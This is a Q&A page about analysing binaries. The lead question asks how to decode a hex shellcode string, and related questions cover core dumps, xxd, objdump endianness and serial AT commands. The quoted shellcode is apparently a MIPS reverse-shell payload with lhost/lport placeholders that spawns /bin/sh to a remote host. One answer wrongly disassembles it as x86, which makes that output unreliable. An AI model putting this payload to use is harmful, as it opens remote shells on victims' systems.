how to decode shellcode to ascii - linux

i have some shellcode that when i convert to ascii it doesnt output text its just gibberish.
\x24\x11\xff\xff\x24\x04\x27\x0f\x24\x02\x10\x46\x01\x01\x01\x0c\x1e\x20\xff\xfc\x24\x11\x10\x2d\x24\x02\x0f\xa2\x01\x01\x01\x0c\x1c\x40\xff\xf8\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e + lport +\x35\xce + lport +\xaf\xae\xff\xe4\x3c\x0e + lhost[:2] +\x35\xce + lhost[2:4] +\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x78\x27\x8f\xa4\xff\xff\x01\xe0\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x21\xef\xff\xff\x15\xf0\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c
i tried decoding it multiple ways with the same output, is there any other way to decode this?

You can disassemble using python one liner with ndisasm tools.
eg. python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -
Result :
00000000 2411 and al,0x11
00000002 FF db 0xff
00000003 FF2404 jmp [esp+eax]
00000006 27 daa
00000007 0F db 0x0f
00000008 0A db 0x0a

You could use cutter which is a debug / dumping tool for all kinds of files.
You can make a files e.g:
touch script.sh type your shellcode in the file and then run e.g: cutter script.sh if you don't know how to use the individual tools in the CLI, and get more information in one place, then only the dissasembly with:
python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -
then cutter is a great tool for showing you information quick and easy.
Cutter:
https://cutter.re/

Related

How can I examine a process' image?

First I find the process' pid with ps:
% ps -a | grep 'a.out'
output:
36296 pts/0 00:00:07 a.out
Then I get an image of this process with gcore:
% sudo gcore 36296
output:
0x0000558eab27d131 in main ()
warning: Memory read failed for corefile section, 4096 bytes at 0xffffffffff600000.
Saved corefile core.36296
[Inferior 1 (process 36296) detached]
Then, hex dump object:
% hd core.36296 | grep 'HOME'
output:
001f4a90 3d 32 00 48 4f 4d 45 3d 2f 68 6f 6d 65 2f 63 61 |=2.HOME=/home/ca|
Now, I'm trying to find the section where environment variables is loaded. How can I do this ?
You should use a debugger!
For linux, gcc and gdb you can do:
> gdb <executable> <core-file>
Within gdb you now can examine the environment from the core file:
(gdb) print ((char**)__environ)[0]
$1 = 0x7ffc6aba0a58 "SHELL=/bin/bash"
(gdb) print ((char**)__environ)[1]
$2 = 0x7ffc6aba0a68 "SESSION_MANAGER=local/unix:#/tmp/.ICE-unix/1873,unix/unix:/tmp/.ICE-unix/1873"
unless you get a string with length 0.
If you do not have an executable with debug infos, you also can try to find the text with:
strings –a <core-file>
But before you write a core file and try to search in it, you simply can get the environment from a process by using ps if your program is still running:
ps eww <pid>

How do you get plain text from binary where the plaintext is formatted by itself?

Desired output of something like "xxd -b file":
00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000
..etc
then followed by
plaintext here
Actual output:
00000000 00000000 00000000 00000000 plai
00000000 00000000 00000000 00000000 n te
00000000 00000000 00000000 00000000 xt h
Hopefully communicates what I'm getting at. This is just a minor issue I encountered doing a beginner CTF, but it felt very off and sloppy to copy paste just one line at a time, since highlighting treats the actual information I want in the right column as just part the array of text. I've tried a few different flags with xxd and read the man page, but I have not found an option that outputs the plaintext by itself or in a manner that is more readable. Is there another tool I should be using, ideally one that is common on most linux distros?
Process the file twice, once by xxd, once by cat. Use cut to remove the plaintext from the xxd output:
xxd -b file | cut -d' ' -f1-8 ; cat file
Use 2-8 if you aren't interested in the positions.

Transferring a TLS/SSL certificate via serial

I need to send a PEM-formatted certificate for storaging on a module that can be communicated with through the AT command set via a serial interface on one of Linux device nodes in /dev.
So far I've been using mostly
echo 'AT' > /dev/ttyX
to issue the necessary commands and it has done the trick just fine.
Any output from the device is monitored with cat /dev/ttyX on another terminal window.
I now have a certificate file encoded with ANSI. The documentation tells me to input it to the module using only LF line breaks and to terminate the input with Ctrl+Z, which I believe is hex 0x1A. The document also specifies that the certificate file may not end with an EOF character. I have used a hex editor to verify that the file is formatted as it should be.
I've tried to use both echo and printf to send the certificate chars / string to the module.
I have tried to include the 0x1A character in both the file and send it separately after the certificate chars like so:
printf '\x1a' > /dev/ttyX
or alternatively
echo -n -e '\x1a' > /dev/ttyX
The module seems to acknowledge the 0x1A as it stops the >-prompt for certificate and gives me the most verbose reply ever: ERROR
Generally, I'm sending the certificate file contents as follows:
echo -e "$(cat certfile)" > /dev/ttyX
or
printf '%b' "$(cat certfile)" > /dev/ttyX
Please assume that I have access to basic Linux shell tools (such as echo, printf, nano, stty and so on) with no option to trivially install new ones. I use SSH to access the target device and pscp to transfer the file to the target device. I also have a Windows rig on the side.
Any suggestions what else I should take into consideration? Maybe an stty option that I've missed? Does cat do something nasty in the input phase? A revealing trick to investigate the actual character data about to be send to the module? Some weird kink with serial comms I've missed?
If I
printf '%b' "$(cat cert)" > ./testoutput
and
od -x testoutput
the file looks alright in hex (I reordered the output from od -x manually, it seems to make pairs of the hex digits and switch them around). For example the end is:
2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 1a 00
There must be something in stty or the receiving end that's causing trouble. Right?
For example the end is:
2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 00 1a
Wait a sec. What's that 00 doing there, right before the 1a?
That doesn't belong. Try removing it.

Differences between objdump and xxd

I am trying to find a call function in a binary file, so I tried this:
Compile my code (in C),
Use the command: mips-mti-linux-gnu-objdump -d myapp.elf> objdump.txt
My function in objdump.txt file: 9d003350: 42000828 myfunction 0x1
Now, I want to identify this function in myapp.bin when reading this from memory. But, I get this: 28080042.
I tried to use the command: xxd -ps myapp.bin> xxd.txt
Just can find: 28080042.
Is it possible to do that?
That's an endianness conflict. objdump and xxd are giving you the same bytes, they're just using different endianness.
Actual bytes in order:
28 08 00 42
Big endian value:
28 08 00 42
Little endian value:
42 00 08 28
xxd -p will print out the individual bytes in the file in the order in which they exist.
objdump is disassembling it, it knows that the bytes belong in groups of 4, and it's interpreting them as little-endian.
xxd can print in little-endian order, using the -e flag (with a default grouping of 4 bytes, use the -g flag to change the number of bytes per group). However, this is incompatible with the -p flag, because the -p flag ignores any grouping.
objdump can be made to print in big-endian order, using the -EB flag, however, this will affect what instructions it reports.

How to simply get a machine code of exactly one assembly instruction?

How to simply get a code of exactly one assembly instruction?
For example for "mov eax 0x14".
I want to get it in linux terminal preferably with gcc or gdm.
$ echo "mov eax, 0x14" | as -o /dev/null -al -msyntax=intel -mnaked-reg
GAS LISTING page 1
1 0000 B8140000 mov eax,0x14
1 00
rasm2 from the radare2 package fits this purpose nicely:
$ rasm2 'nop'
90
$ rasm2 -d '90'
nop
http://radare.org/y/?p=examples&f=rasm

Resources